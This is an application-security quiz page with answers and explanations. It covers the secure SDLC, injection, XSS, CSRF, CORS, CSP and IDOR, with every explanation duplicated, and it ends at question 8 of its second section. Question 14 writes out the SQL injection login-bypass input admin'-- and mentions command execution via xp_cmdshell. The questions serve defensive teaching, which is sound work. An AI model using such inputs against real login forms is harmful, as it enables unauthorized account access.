Application Security MCQ 60 Tests With Answers (2026)
PerfectNotes TeamUpdated: March 2026~15 min practice 60 Questions Β· 3 Levels 60 Questions Β· 3 Levels
Application Security MCQ practice questions are essential for preparing for competitive exams, professional certifications (CSSLP, CEH, GWEB, OSWE), and secure software engineering interviews. This comprehensive testing platform provides 60 carefully curated practice questions covering the secure Software Development Life Cycle (SDLC), code analysis, threat modeling, and secure implementation patterns.
These questions are organized into three progressive difficulty levels of 20 questions each: Basics (covering foundational terminology, secure SDLC phases, and the Principle of Least Privilege), Concepts (covering SAST vs DAST tools, STRIDE threat modeling, and OWASP Top 10 web vulnerabilities), and Advanced (covering scenario-based secure design, supply chain attacks, RASP, and container security). Each question includes a verified, in-depth explanation to reinforce learning.
Practice in Study Mode to reveal answers and detailed explanations instantly, or use Exam Mode for timed testing and real-time scoring to simulate professional exam conditions. The interactive engine tracks your progress and identifies knowledge gaps across static and dynamic security analysis, authentication protocols, and backend API integration.
Contents
- 1.Basics (20 Questions)SDLC security Β· injection flaws Β· secure design principles
- 2.Concepts (20 Questions)threat modeling Β· DAST/SAST/SCA Β· authentication flaws
- 3.Advanced (20 Questions)zero-day handling Β· API security Β· DevSecOps pipelines
- 4.Conclusionsummary Β· next steps Β· study tips
- 5.Key Takeawaysquick-fire bullet recap of essential facts
- 6.Quick Review Summaryconcept Β· definition Β· key fact table
- 7.FAQcommon questions answered
Application Security β Basics
1What is the primary objective of Application Security (AppSec)?
CorrectA: To identify, fix, and prevent security vulnerabilities within software applications throughout their lifecycle
Application Security (AppSec) is the discipline of building, testing, and maintaining security controls within software applications throughout their entire lifecycle β from design and coding through deployment and maintenance. Unlike network or infrastructure security, AppSec focuses specifically on the software layer: preventing vulnerabilities like injection flaws, authentication weaknesses, and insecure deserialization from being introduced during development and ensuring they are identified and remediated before or after release.
IncorrectA: To identify, fix, and prevent security vulnerabilities within software applications throughout their lifecycle
Application Security (AppSec) is the discipline of building, testing, and maintaining security controls within software applications throughout their entire lifecycle β from design and coding through deployment and maintenance. Unlike network or infrastructure security, AppSec focuses specifically on the software layer: preventing vulnerabilities like injection flaws, authentication weaknesses, and insecure deserialization from being introduced during development and ensuring they are identified and remediated before or after release.
2In the context of software development, what does "SDLC" stand for?
CorrectC: Software Development Life Cycle
SDLC (Software Development Life Cycle) is the structured process used to plan, create, test, and deploy software. The standard phases are: Requirements β Design β Implementation (Coding) β Testing β Deployment β Maintenance. A "Secure SDLC" integrates security activities into every phase β threat modeling in Design, SAST in Implementation, DAST in Testing, and penetration testing before Deployment β rather than treating security as an afterthought bolt-on at the end.
IncorrectC: Software Development Life Cycle
SDLC (Software Development Life Cycle) is the structured process used to plan, create, test, and deploy software. The standard phases are: Requirements β Design β Implementation (Coding) β Testing β Deployment β Maintenance. A "Secure SDLC" integrates security activities into every phase β threat modeling in Design, SAST in Implementation, DAST in Testing, and penetration testing before Deployment β rather than treating security as an afterthought bolt-on at the end.
3Applying the CIA Triad to application security, what does "Integrity" ensure?
CorrectD: That data is not maliciously or accidentally altered by unauthorized entities
Integrity in the CIA Triad ensures that data remains accurate, complete, and unmodified except through authorized processes. In application security this means: protecting database records from tampering, using cryptographic MACs or digital signatures to verify data has not been altered in transit, preventing SQL injection that could modify records, and ensuring audit logs themselves cannot be modified. A violation of Integrity β such as an attacker changing a bank balance or order price β can be financially devastating even without a data breach.
IncorrectD: That data is not maliciously or accidentally altered by unauthorized entities
Integrity in the CIA Triad ensures that data remains accurate, complete, and unmodified except through authorized processes. In application security this means: protecting database records from tampering, using cryptographic MACs or digital signatures to verify data has not been altered in transit, preventing SQL injection that could modify records, and ensuring audit logs themselves cannot be modified. A violation of Integrity β such as an attacker changing a bank balance or order price β can be financially devastating even without a data breach.
4What does the "Principle of Least Privilege" dictate in application design?
CorrectB: Users, processes, and programs should be granted only the minimum access rights necessary to perform their required tasks
The Principle of Least Privilege (PoLP) is a foundational security design pattern: every user account, service account, process, and software component should be granted only the exact permissions it needs to perform its specific job β nothing more. In practice: a web application's database account should have SELECT/INSERT rights only, not DROP TABLE or system procedure execution. A microservice handling email should not have access to the payments database. PoLP minimizes the blast radius of a compromise: if an attacker hijacks a limited account, they gain only limited capability.
IncorrectB: Users, processes, and programs should be granted only the minimum access rights necessary to perform their required tasks
The Principle of Least Privilege (PoLP) is a foundational security design pattern: every user account, service account, process, and software component should be granted only the exact permissions it needs to perform its specific job β nothing more. In practice: a web application's database account should have SELECT/INSERT rights only, not DROP TABLE or system procedure execution. A microservice handling email should not have access to the payments database. PoLP minimizes the blast radius of a compromise: if an attacker hijacks a limited account, they gain only limited capability.
5Which of the following is the most critical practice for preventing injection attacks?
CorrectA: Strictly validating, sanitizing, and encoding all user-supplied input before processing it
Injection attacks (SQL, Command, LDAP, XSS) all share the same root cause: untrusted user input being processed as code or a command. The primary defense is a combination of: (1) Input Validation β accept only what is expected (allow-listing); (2) Sanitization β strip or escape dangerous characters; (3) Output Encoding β encode data for the specific context where it will be rendered (HTML, SQL, shell). For SQL specifically, Parameterized Queries (Prepared Statements) are the definitive fix β they separate code from data so user input can never be interpreted as SQL.
IncorrectA: Strictly validating, sanitizing, and encoding all user-supplied input before processing it
Injection attacks (SQL, Command, LDAP, XSS) all share the same root cause: untrusted user input being processed as code or a command. The primary defense is a combination of: (1) Input Validation β accept only what is expected (allow-listing); (2) Sanitization β strip or escape dangerous characters; (3) Output Encoding β encode data for the specific context where it will be rendered (HTML, SQL, shell). For SQL specifically, Parameterized Queries (Prepared Statements) are the definitive fix β they separate code from data so user input can never be interpreted as SQL.
6What is the fundamental difference between Authentication and Authorization in an application?
CorrectC: Authentication verifies the user's identity; Authorization determines what resources that user is allowed to access
Authentication asks "Who are you?" and verifies identity through credentials (password, biometric, certificate, token). Authorization asks "What are you allowed to do?" and enforces access control policies after identity is established. These are separate concerns: a user can be successfully authenticated (valid credentials) but still unauthorized to access a specific resource. Confusing the two leads to broken access control β OWASP A01:2021, the most prevalent web application vulnerability. An application must check both: valid identity AND the appropriate permission for every protected operation.
IncorrectC: Authentication verifies the user's identity; Authorization determines what resources that user is allowed to access
Authentication asks "Who are you?" and verifies identity through credentials (password, biometric, certificate, token). Authorization asks "What are you allowed to do?" and enforces access control policies after identity is established. These are separate concerns: a user can be successfully authenticated (valid credentials) but still unauthorized to access a specific resource. Confusing the two leads to broken access control β OWASP A01:2021, the most prevalent web application vulnerability. An application must check both: valid identity AND the appropriate permission for every protected operation.
7What is a "Zero-Day" vulnerability?
CorrectD: A newly discovered software flaw for which no official patch or mitigation currently exists
A Zero-Day vulnerability is a software flaw that has been discovered β either by a researcher, attacker, or defender β but for which the vendor has not yet released a patch. The name refers to the fact that developers have had "zero days" to fix it. Zero-days are highly valuable to attackers because all installations are vulnerable, there is no official remediation, and standard patch-management defenses are ineffective. Mitigations include: WAF virtual patches, network segmentation, disabling the vulnerable feature, and enhanced monitoring for exploitation indicators.
IncorrectD: A newly discovered software flaw for which no official patch or mitigation currently exists
A Zero-Day vulnerability is a software flaw that has been discovered β either by a researcher, attacker, or defender β but for which the vendor has not yet released a patch. The name refers to the fact that developers have had "zero days" to fix it. Zero-days are highly valuable to attackers because all installations are vulnerable, there is no official remediation, and standard patch-management defenses are ineffective. Mitigations include: WAF virtual patches, network segmentation, disabling the vulnerable feature, and enhanced monitoring for exploitation indicators.
8Which type of vulnerability occurs when a program writes more data to a block of memory than it was allocated to hold?
CorrectB: Buffer Overflow
A Buffer Overflow occurs when a program attempts to write data beyond the boundary of a fixed-size memory buffer, overwriting adjacent memory β including the stack return address or heap metadata. Stack-based buffer overflows can allow attackers to redirect program execution to shellcode. Heap overflows can corrupt allocator metadata for similar effect. Classic exploits targeted C/C++ code. Modern mitigations include: stack canaries (GCC -fstack-protector), ASLR (Address Space Layout Randomisation), DEP/NX (Data Execution Prevention), and using memory-safe languages like Rust or Go.
IncorrectB: Buffer Overflow
A Buffer Overflow occurs when a program attempts to write data beyond the boundary of a fixed-size memory buffer, overwriting adjacent memory β including the stack return address or heap metadata. Stack-based buffer overflows can allow attackers to redirect program execution to shellcode. Heap overflows can corrupt allocator metadata for similar effect. Classic exploits targeted C/C++ code. Modern mitigations include: stack canaries (GCC -fstack-protector), ASLR (Address Space Layout Randomisation), DEP/NX (Data Execution Prevention), and using memory-safe languages like Rust or Go.
9What is the primary purpose of Patch Management in application security?
CorrectA: To systematically acquire, test, and install code updates to fix known security vulnerabilities
Patch Management is the process of consistently identifying, testing, and applying software updates (patches) to fix known vulnerabilities before attackers exploit them. The Ponemon Institute found that 60% of data breaches involved unpatched vulnerabilities where a patch was already available. Effective patch management requires: asset inventory (knowing what software you run), CVE monitoring (tracking newly disclosed vulnerabilities), risk-based prioritisation (CVSS scores), testing in staging, and documented SLAs (e.g., critical patches within 24β72 hours). Log4Shell was exploited within hours of public disclosure.
IncorrectA: To systematically acquire, test, and install code updates to fix known security vulnerabilities
Patch Management is the process of consistently identifying, testing, and applying software updates (patches) to fix known vulnerabilities before attackers exploit them. The Ponemon Institute found that 60% of data breaches involved unpatched vulnerabilities where a patch was already available. Effective patch management requires: asset inventory (knowing what software you run), CVE monitoring (tracking newly disclosed vulnerabilities), risk-based prioritisation (CVSS scores), testing in staging, and documented SLAs (e.g., critical patches within 24β72 hours). Log4Shell was exploited within hours of public disclosure.
10What does Two-Factor Authentication (2FA) require from a user?
CorrectB: Providing two different categories of credentials, such as something they know (password) and something they have (a code from a mobile device)
2FA (Two-Factor Authentication) requires proof of identity from two distinct categories: (1) Something you know β password, PIN, security question; (2) Something you have β TOTP code (Google Authenticator), SMS OTP, hardware security key (FIDO2/WebAuthn); (3) Something you are β fingerprint, face recognition, retina scan. Using two factors from the same category (two passwords) is NOT true 2FA. Microsoft reports that MFA blocks 99.9% of automated account takeover attacks, because even if an attacker steals a password via phishing, they still cannot complete authentication without the second factor.
IncorrectB: Providing two different categories of credentials, such as something they know (password) and something they have (a code from a mobile device)
2FA (Two-Factor Authentication) requires proof of identity from two distinct categories: (1) Something you know β password, PIN, security question; (2) Something you have β TOTP code (Google Authenticator), SMS OTP, hardware security key (FIDO2/WebAuthn); (3) Something you are β fingerprint, face recognition, retina scan. Using two factors from the same category (two passwords) is NOT true 2FA. Microsoft reports that MFA blocks 99.9% of automated account takeover attacks, because even if an attacker steals a password via phishing, they still cannot complete authentication without the second factor.
11Why is TLS (Transport Layer Security) critical for web applications?
CorrectC: It encrypts the communication channel between the client and the server, protecting data in transit from eavesdropping
TLS (the successor to SSL) encrypts the communication channel between a browser and web server, preventing Man-in-the-Middle (MitM) attacks where an attacker on the same network (e.g., public Wi-Fi) intercepts traffic. Without TLS, credentials, session cookies, PII, and financial data travel in plaintext β readable by any network observer. TLS also authenticates the server via digital certificates, preventing impersonation. Modern best practices: TLS 1.2 minimum (TLS 1.3 preferred), HSTS (HTTP Strict Transport Security) to prevent SSL stripping, and proper certificate validation. HTTP alone is considered a Cryptographic Failure (OWASP A02).
IncorrectC: It encrypts the communication channel between the client and the server, protecting data in transit from eavesdropping
TLS (the successor to SSL) encrypts the communication channel between a browser and web server, preventing Man-in-the-Middle (MitM) attacks where an attacker on the same network (e.g., public Wi-Fi) intercepts traffic. Without TLS, credentials, session cookies, PII, and financial data travel in plaintext β readable by any network observer. TLS also authenticates the server via digital certificates, preventing impersonation. Modern best practices: TLS 1.2 minimum (TLS 1.3 preferred), HSTS (HTTP Strict Transport Security) to prevent SSL stripping, and proper certificate validation. HTTP alone is considered a Cryptographic Failure (OWASP A02).
12What is the purpose of conducting a Code Review?
CorrectD: To systematically examine source code to identify logic errors, security flaws, and deviations from secure coding standards
A Code Review (specifically a Security-Focused Code Review) involves systematically examining source code β either manually by another developer/security engineer or automatically via SAST tools β to find vulnerabilities before the code reaches production. Manual reviews catch logic flaws, business rule violations, and subtle authentication bypasses that automated tools miss. Automated SAST tools (SonarQube, Semgrep, Checkmarx) scan for known vulnerability patterns at scale. Code reviews integrated into the pull request workflow ("shift-left security") are the cheapest point to fix bugs β a defect found in code review costs ~6x less to fix than one found in production.
IncorrectD: To systematically examine source code to identify logic errors, security flaws, and deviations from secure coding standards
A Code Review (specifically a Security-Focused Code Review) involves systematically examining source code β either manually by another developer/security engineer or automatically via SAST tools β to find vulnerabilities before the code reaches production. Manual reviews catch logic flaws, business rule violations, and subtle authentication bypasses that automated tools miss. Automated SAST tools (SonarQube, Semgrep, Checkmarx) scan for known vulnerability patterns at scale. Code reviews integrated into the pull request workflow ("shift-left security") are the cheapest point to fix bugs β a defect found in code review costs ~6x less to fix than one found in production.
13A vulnerability that allows an attacker to inject malicious client-side JavaScript into a web page viewed by other users is known as:
CorrectC: Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) allows attackers to inject malicious JavaScript into web pages viewed by other users. Three types: (1) Reflected XSS β payload in the URL/request, reflected in the immediate response; (2) Stored XSS β payload persistently stored in the database and served to all subsequent viewers; (3) DOM-Based XSS β payload processed and executed entirely in the browser without touching the server. XSS enables: session cookie theft, account takeover, keylogging, phishing overlays, and malware distribution. Under OWASP A03:2021 (Injection). Prevention: output encoding (HTML entities), Content-Security-Policy (CSP), and avoiding innerHTML with user data.
IncorrectC: Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) allows attackers to inject malicious JavaScript into web pages viewed by other users. Three types: (1) Reflected XSS β payload in the URL/request, reflected in the immediate response; (2) Stored XSS β payload persistently stored in the database and served to all subsequent viewers; (3) DOM-Based XSS β payload processed and executed entirely in the browser without touching the server. XSS enables: session cookie theft, account takeover, keylogging, phishing overlays, and malware distribution. Under OWASP A03:2021 (Injection). Prevention: output encoding (HTML entities), Content-Security-Policy (CSP), and avoiding innerHTML with user data.
14A vulnerability that allows an attacker to manipulate backend database queries by entering malicious syntax into a web form is called:
CorrectA: SQL Injection (SQLi)
SQL Injection (SQLi) occurs when user input is concatenated directly into a SQL query, allowing the attacker to inject additional SQL syntax. Example: a login form with username admin'-- closes the string and comments out the password check, bypassing authentication. SQLi can lead to: unauthorized data access, data modification or deletion, authentication bypass, stored procedure execution, and via xp_cmdshell in MSSQL β OS command execution. The #1 defense is Parameterized Queries (Prepared Statements), which separate SQL code from data and make injection structurally impossible. OWASP A03:2021.
IncorrectA: SQL Injection (SQLi)
SQL Injection (SQLi) occurs when user input is concatenated directly into a SQL query, allowing the attacker to inject additional SQL syntax. Example: a login form with username admin'-- closes the string and comments out the password check, bypassing authentication. SQLi can lead to: unauthorized data access, data modification or deletion, authentication bypass, stored procedure execution, and via xp_cmdshell in MSSQL β OS command execution. The #1 defense is Parameterized Queries (Prepared Statements), which separate SQL code from data and make injection structurally impossible. OWASP A03:2021.
15What is the security function of Session Management?
CorrectD: Securely handling the state and tokens that identify an authenticated user across multiple requests
HTTP is stateless β each request is independent. Session Management provides continuity of identity by issuing a session token (cookie or header value) after successful authentication that is sent with every subsequent request. Secure session management requires: cryptographically random tokens (CSPRNG, minimum 128 bits of entropy), HttpOnly and Secure cookie flags, short idle timeouts, absolute session expiry, invalidation on logout and privilege changes, and protection against fixation (regenerate session ID after login). Weak session management enables session hijacking β if an attacker steals your session token, they become you from the server's perspective.
IncorrectD: Securely handling the state and tokens that identify an authenticated user across multiple requests
HTTP is stateless β each request is independent. Session Management provides continuity of identity by issuing a session token (cookie or header value) after successful authentication that is sent with every subsequent request. Secure session management requires: cryptographically random tokens (CSPRNG, minimum 128 bits of entropy), HttpOnly and Secure cookie flags, short idle timeouts, absolute session expiry, invalidation on logout and privilege changes, and protection against fixation (regenerate session ID after login). Weak session management enables session hijacking β if an attacker steals your session token, they become you from the server's perspective.
16Which of the following is NOT a technical application flaw, but rather a human-centric attack vector?
CorrectB: Social Engineering
Social Engineering is not a technical vulnerability in the application code β it is a psychological manipulation attack targeting human users or employees. Attackers impersonate trusted entities (IT support, executives, colleagues) to trick victims into revealing credentials, clicking malicious links, or transferring money. The other options are all technical code flaws: Command Injection (unsanitized input passed to OS commands), Open Redirects (malicious URLs embedded in redirect parameters), and Unvalidated Forwards (bypassing access controls via internal request forwarding). Social engineering is responsible for the majority of initial access in data breaches (Verizon DBIR).
IncorrectB: Social Engineering
Social Engineering is not a technical vulnerability in the application code β it is a psychological manipulation attack targeting human users or employees. Attackers impersonate trusted entities (IT support, executives, colleagues) to trick victims into revealing credentials, clicking malicious links, or transferring money. The other options are all technical code flaws: Command Injection (unsanitized input passed to OS commands), Open Redirects (malicious URLs embedded in redirect parameters), and Unvalidated Forwards (bypassing access controls via internal request forwarding). Social engineering is responsible for the majority of initial access in data breaches (Verizon DBIR).
17What is the primary function of a Web Application Firewall (WAF)?
CorrectC: To inspect incoming HTTP/HTTPS traffic and block malicious payloads targeting the application layer
A WAF (Web Application Firewall) operates at Layer 7 (Application Layer) and inspects HTTP/HTTPS request and response content for attack signatures β SQLi payloads, XSS vectors, path traversal sequences, malformed headers, and protocol violations. Unlike network firewalls that work at IP/port level, WAFs understand web application logic. WAFs can operate in three modes: blocking (active), detection-only (passive), and learning (building a positive security model). Important: WAFs are a compensating control β they reduce risk but don't fix the underlying vulnerability. A sophisticated attacker can often bypass WAF rules; fixing the code remains the correct remediation.
IncorrectC: To inspect incoming HTTP/HTTPS traffic and block malicious payloads targeting the application layer
A WAF (Web Application Firewall) operates at Layer 7 (Application Layer) and inspects HTTP/HTTPS request and response content for attack signatures β SQLi payloads, XSS vectors, path traversal sequences, malformed headers, and protocol violations. Unlike network firewalls that work at IP/port level, WAFs understand web application logic. WAFs can operate in three modes: blocking (active), detection-only (passive), and learning (building a positive security model). Important: WAFs are a compensating control β they reduce risk but don't fix the underlying vulnerability. A sophisticated attacker can often bypass WAF rules; fixing the code remains the correct remediation.
18Why is storing user passwords in plaintext considered a critical application security failure?
CorrectA: If the database is compromised, attackers immediately gain access to all user credentials without needing to crack them
Storing passwords in plaintext means that a single database breach instantly exposes every user's password β no cracking required. Since approximately 65% of users reuse passwords across multiple sites (credential stuffing), one breach compromises accounts on many other platforms. The correct practice is to hash passwords using a modern, slow, memory-hard password hashing algorithm: Argon2id (OWASP recommended), bcrypt, or scrypt β combined with a unique per-user salt. These algorithms are intentionally designed to be computationally expensive, making brute-force and dictionary attacks impractical even after a database breach. MD5 and SHA-1/SHA-256 without key stretching are NOT acceptable for password storage.
IncorrectA: If the database is compromised, attackers immediately gain access to all user credentials without needing to crack them
Storing passwords in plaintext means that a single database breach instantly exposes every user's password β no cracking required. Since approximately 65% of users reuse passwords across multiple sites (credential stuffing), one breach compromises accounts on many other platforms. The correct practice is to hash passwords using a modern, slow, memory-hard password hashing algorithm: Argon2id (OWASP recommended), bcrypt, or scrypt β combined with a unique per-user salt. These algorithms are intentionally designed to be computationally expensive, making brute-force and dictionary attacks impractical even after a database breach. MD5 and SHA-1/SHA-256 without key stretching are NOT acceptable for password storage.
19What is a common risk associated with deploying off-the-shelf applications or frameworks without hardening them?
CorrectD: Attackers can exploit default administrative credentials or insecure default configurations that are widely known
Default credentials and configurations are a rampant Security Misconfiguration risk (OWASP A05:2021). Vendors ship applications with default admin accounts (admin/admin, admin/password), enabled debug endpoints, sample applications, directory listing, verbose error pages, and unused features enabled. These defaults are publicly documented β automated scanners and tools like Shodan actively search the internet for them. Hardening means: changing all default credentials, disabling unused features and services, removing sample applications, configuring production-appropriate error handling, applying CIS Benchmarks, and performing automated configuration scanning as part of the deployment pipeline.
IncorrectD: Attackers can exploit default administrative credentials or insecure default configurations that are widely known
Default credentials and configurations are a rampant Security Misconfiguration risk (OWASP A05:2021). Vendors ship applications with default admin accounts (admin/admin, admin/password), enabled debug endpoints, sample applications, directory listing, verbose error pages, and unused features enabled. These defaults are publicly documented β automated scanners and tools like Shodan actively search the internet for them. Hardening means: changing all default credentials, disabling unused features and services, removing sample applications, configuring production-appropriate error handling, applying CIS Benchmarks, and performing automated configuration scanning as part of the deployment pipeline.
20What is the secure best practice for handling application error messages?
CorrectB: Display a generic, user-friendly error message to the client while logging detailed diagnostic information securely on the backend
Verbose error messages exposing stack traces, SQL queries, file paths, internal IP addresses, framework versions, and configuration details are a Security Misconfiguration flaw (OWASP A05). Attackers use this information for reconnaissance: a stack trace revealing the ORM query helps craft a SQLi payload; a disclosed framework version maps to known CVEs. The correct approach: show generic, user-friendly messages in the UI ("An error occurred. Reference ID: XK-4721"), while logging the full diagnostic detail β exception type, stack trace, request context β to a secure, centralized logging system (ELK, Splunk) accessible only to operations and security teams.
IncorrectB: Display a generic, user-friendly error message to the client while logging detailed diagnostic information securely on the backend
Verbose error messages exposing stack traces, SQL queries, file paths, internal IP addresses, framework versions, and configuration details are a Security Misconfiguration flaw (OWASP A05). Attackers use this information for reconnaissance: a stack trace revealing the ORM query helps craft a SQLi payload; a disclosed framework version maps to known CVEs. The correct approach: show generic, user-friendly messages in the UI ("An error occurred. Reference ID: XK-4721"), while logging the full diagnostic detail β exception type, stack trace, request context β to a secure, centralized logging system (ELK, Splunk) accessible only to operations and security teams.
Application Security β Concepts
1What is the primary difference between SAST (Static Application Security Testing) and DAST (Dynamic Application Security Testing)?
CorrectC: SAST analyzes the application's source code from the inside without running it; DAST interacts with the running application from the outside to find vulnerabilities
SAST (white-box testing) analyzes source code, bytecode, or binaries without execution β finding vulnerabilities like SQL string concatenation, hardcoded secrets, unsafe deserialization patterns, and path traversal as early as the coding phase. Tools: SonarQube, Semgrep, Checkmarx, Fortify. DAST (black-box testing) sends crafted HTTP requests to a running application and analyzes responses β finding runtime vulnerabilities like authentication bypasses, session management flaws, and server configuration issues that aren't visible in source code. Tools: OWASP ZAP, Burp Suite, Invicti. Modern DevSecOps pipelines integrate both: SAST in the CI pipeline on every commit, DAST in the staging environment before release.
IncorrectC: SAST analyzes the application's source code from the inside without running it; DAST interacts with the running application from the outside to find vulnerabilities
SAST (white-box testing) analyzes source code, bytecode, or binaries without execution β finding vulnerabilities like SQL string concatenation, hardcoded secrets, unsafe deserialization patterns, and path traversal as early as the coding phase. Tools: SonarQube, Semgrep, Checkmarx, Fortify. DAST (black-box testing) sends crafted HTTP requests to a running application and analyzes responses β finding runtime vulnerabilities like authentication bypasses, session management flaws, and server configuration issues that aren't visible in source code. Tools: OWASP ZAP, Burp Suite, Invicti. Modern DevSecOps pipelines integrate both: SAST in the CI pipeline on every commit, DAST in the staging environment before release.
2What is "Threat Modeling" in the context of the SDLC?
CorrectA: A structured process for identifying, evaluating, and mitigating potential security threats during the design phase of an application
Threat Modeling is a proactive, design-phase security activity where architects and security engineers systematically identify: (1) What the application does and what assets it protects; (2) What threats could compromise those assets (using STRIDE β Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege); (3) Which threats are most likely and impactful; (4) What mitigations to implement. Done during design, threat modeling costs a fraction of finding the same flaws in production. The output is a threat model document that drives security requirements. Microsoft pioneered STRIDE; other methodologies include PASTA, VAST, and Attack Trees.
IncorrectA: A structured process for identifying, evaluating, and mitigating potential security threats during the design phase of an application
Threat Modeling is a proactive, design-phase security activity where architects and security engineers systematically identify: (1) What the application does and what assets it protects; (2) What threats could compromise those assets (using STRIDE β Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege); (3) Which threats are most likely and impactful; (4) What mitigations to implement. Done during design, threat modeling costs a fraction of finding the same flaws in production. The output is a threat model document that drives security requirements. Microsoft pioneered STRIDE; other methodologies include PASTA, VAST, and Attack Trees.
3In the STRIDE threat modeling methodology, what does the "S" stand for?
CorrectB: Spoofing
STRIDE is Microsoft's threat modeling taxonomy: S β Spoofing (impersonating another user, system, or process; violates Authentication), T β Tampering (maliciously modifying data or code; violates Integrity), R β Repudiation (performing an action and denying it; violates Non-Repudiation), I β Information Disclosure (exposing data to unauthorized parties; violates Confidentiality), D β Denial of Service (making the system unavailable; violates Availability), E β Elevation of Privilege (gaining capabilities beyond what is authorized; violates Authorization). Each category maps to a security property that the design must protect. STRIDE is applied to each component in a Data Flow Diagram (DFD) of the application architecture.
IncorrectB: Spoofing
STRIDE is Microsoft's threat modeling taxonomy: S β Spoofing (impersonating another user, system, or process; violates Authentication), T β Tampering (maliciously modifying data or code; violates Integrity), R β Repudiation (performing an action and denying it; violates Non-Repudiation), I β Information Disclosure (exposing data to unauthorized parties; violates Confidentiality), D β Denial of Service (making the system unavailable; violates Availability), E β Elevation of Privilege (gaining capabilities beyond what is authorized; violates Authorization). Each category maps to a security property that the design must protect. STRIDE is applied to each component in a Data Flow Diagram (DFD) of the application architecture.
4What does CORS (Cross-Origin Resource Sharing) allow a web application to do?
CorrectA: Safely relax the Same-Origin Policy to specify exactly which external domains are permitted to access its resources
The Same-Origin Policy (SOP) is a browser security mechanism that prevents scripts on one origin (scheme + domain + port) from reading responses from a different origin. CORS is an HTTP header-based mechanism that allows servers to explicitly declare which origins are permitted to make cross-origin requests. For example, Access-Control-Allow-Origin: https://app.example.com allows only that domain. The critical misconfiguration: setting Access-Control-Allow-Origin: * with Access-Control-Allow-Credentials: true, or dynamically reflecting the request's Origin header without validation β this allows any malicious website to send credentialed requests to your API and read the response, defeating SOP entirely.
IncorrectA: Safely relax the Same-Origin Policy to specify exactly which external domains are permitted to access its resources
The Same-Origin Policy (SOP) is a browser security mechanism that prevents scripts on one origin (scheme + domain + port) from reading responses from a different origin. CORS is an HTTP header-based mechanism that allows servers to explicitly declare which origins are permitted to make cross-origin requests. For example, Access-Control-Allow-Origin: https://app.example.com allows only that domain. The critical misconfiguration: setting Access-Control-Allow-Origin: * with Access-Control-Allow-Credentials: true, or dynamically reflecting the request's Origin header without validation β this allows any malicious website to send credentialed requests to your API and read the response, defeating SOP entirely.
5Which HTTP response header is explicitly designed to prevent XSS attacks by restricting the sources from which executable scripts can be loaded?
CorrectD: Content-Security-Policy (CSP)
Content-Security-Policy (CSP) is a powerful browser security mechanism delivered via HTTP response header (or meta tag) that instructs the browser to only execute scripts, load styles, images, and other resources from explicitly approved sources. A strict CSP β script-src 'self' β blocks inline scripts, eval(), and scripts from any external origin, defeating most XSS attacks even if the attacker successfully injects a payload. Key CSP directives: script-src (JavaScript sources), style-src (CSS), img-src (images), connect-src (XHR/fetch), frame-ancestors (clickjacking protection). The nonce-based approach (script-src 'nonce-{random}') allows inline scripts while still blocking injected ones.
IncorrectD: Content-Security-Policy (CSP)
Content-Security-Policy (CSP) is a powerful browser security mechanism delivered via HTTP response header (or meta tag) that instructs the browser to only execute scripts, load styles, images, and other resources from explicitly approved sources. A strict CSP β script-src 'self' β blocks inline scripts, eval(), and scripts from any external origin, defeating most XSS attacks even if the attacker successfully injects a payload. Key CSP directives: script-src (JavaScript sources), style-src (CSS), img-src (images), connect-src (XHR/fetch), frame-ancestors (clickjacking protection). The nonce-based approach (script-src 'nonce-{random}') allows inline scripts while still blocking injected ones.
6What is the most effective defense against Cross-Site Request Forgery (CSRF)?
CorrectB: Requiring the client to include a unique, unpredictable, anti-CSRF token with state-changing requests
CSRF tricks an authenticated user's browser into making unintended state-changing requests (fund transfers, password changes, account deletions) to a site where they are logged in, by embedding the request in a malicious page. The anti-CSRF token (Synchronizer Token Pattern) is the primary defense: the server generates a unique, unpredictable token per session or per-request, embeds it in forms (hidden field) or JavaScript state, and verifies its presence on every state-changing request. Since the attacker's malicious page cannot read the token from another origin (Same-Origin Policy), forged requests will lack the valid token. The SameSite=Strict or Lax cookie attribute also provides strong CSRF protection in modern browsers.
IncorrectB: Requiring the client to include a unique, unpredictable, anti-CSRF token with state-changing requests
CSRF tricks an authenticated user's browser into making unintended state-changing requests (fund transfers, password changes, account deletions) to a site where they are logged in, by embedding the request in a malicious page. The anti-CSRF token (Synchronizer Token Pattern) is the primary defense: the server generates a unique, unpredictable token per session or per-request, embeds it in forms (hidden field) or JavaScript state, and verifies its presence on every state-changing request. Since the attacker's malicious page cannot read the token from another origin (Same-Origin Policy), forged requests will lack the valid token. The SameSite=Strict or Lax cookie attribute also provides strong CSRF protection in modern browsers.
7Which coding practice effectively neutralizes SQL Injection vulnerabilities by ensuring the database treats user input strictly as data, never as executable code?
CorrectC: Parameterized Queries (Prepared Statements)
Parameterized Queries (also called Prepared Statements) are the definitive defense against SQL Injection. The SQL query structure is sent to the database engine first as a template with placeholders: SELECT * FROM users WHERE id = ?. The user input is then bound to the placeholder as a typed parameter. The database engine treats the parameter strictly as data β it is structurally impossible for it to be interpreted as SQL syntax, regardless of what characters it contains. This is fundamentally different from escaping/sanitizing input strings, which can be bypassed by encoding tricks. All major web frameworks provide parameterized query support (PDO in PHP, PreparedStatement in Java, parameterized queries in psycopg2 for Python).
IncorrectC: Parameterized Queries (Prepared Statements)
Parameterized Queries (also called Prepared Statements) are the definitive defense against SQL Injection. The SQL query structure is sent to the database engine first as a template with placeholders: SELECT * FROM users WHERE id = ?. The user input is then bound to the placeholder as a typed parameter. The database engine treats the parameter strictly as data β it is structurally impossible for it to be interpreted as SQL syntax, regardless of what characters it contains. This is fundamentally different from escaping/sanitizing input strings, which can be bypassed by encoding tricks. All major web frameworks provide parameterized query support (PDO in PHP, PreparedStatement in Java, parameterized queries in psycopg2 for Python).
8An attacker modifies an API request from GET /api/account/101 to GET /api/account/102 and successfully views another user's banking details. What vulnerability is this?
CorrectD: Insecure Direct Object Reference (IDOR) / Broken Object Level Authorization (BOLA)
IDOR (Insecure Direct Object Reference) / BOLA (Broken Object Level Authorization) is the #1 API vulnerability (OWASP API Security Top 10 2023). It occurs when an application uses a user-controllable identifier (account ID, order number, file name) to access objects without verifying the requesting user is authorized for that specific object. The fix is server-side authorization on every resource access: verify that the authenticated user's identity has ownership or permission for the specific object being requested β not just that they are logged in. Never rely on obscuring or randomizing IDs (security through obscurity) as a substitute for actual authorization checks. This is Broken Access Control (OWASP A01:2021).
IncorrectD: Insecure Direct Object Reference (IDOR) / Broken Object Level Authorization (BOLA)
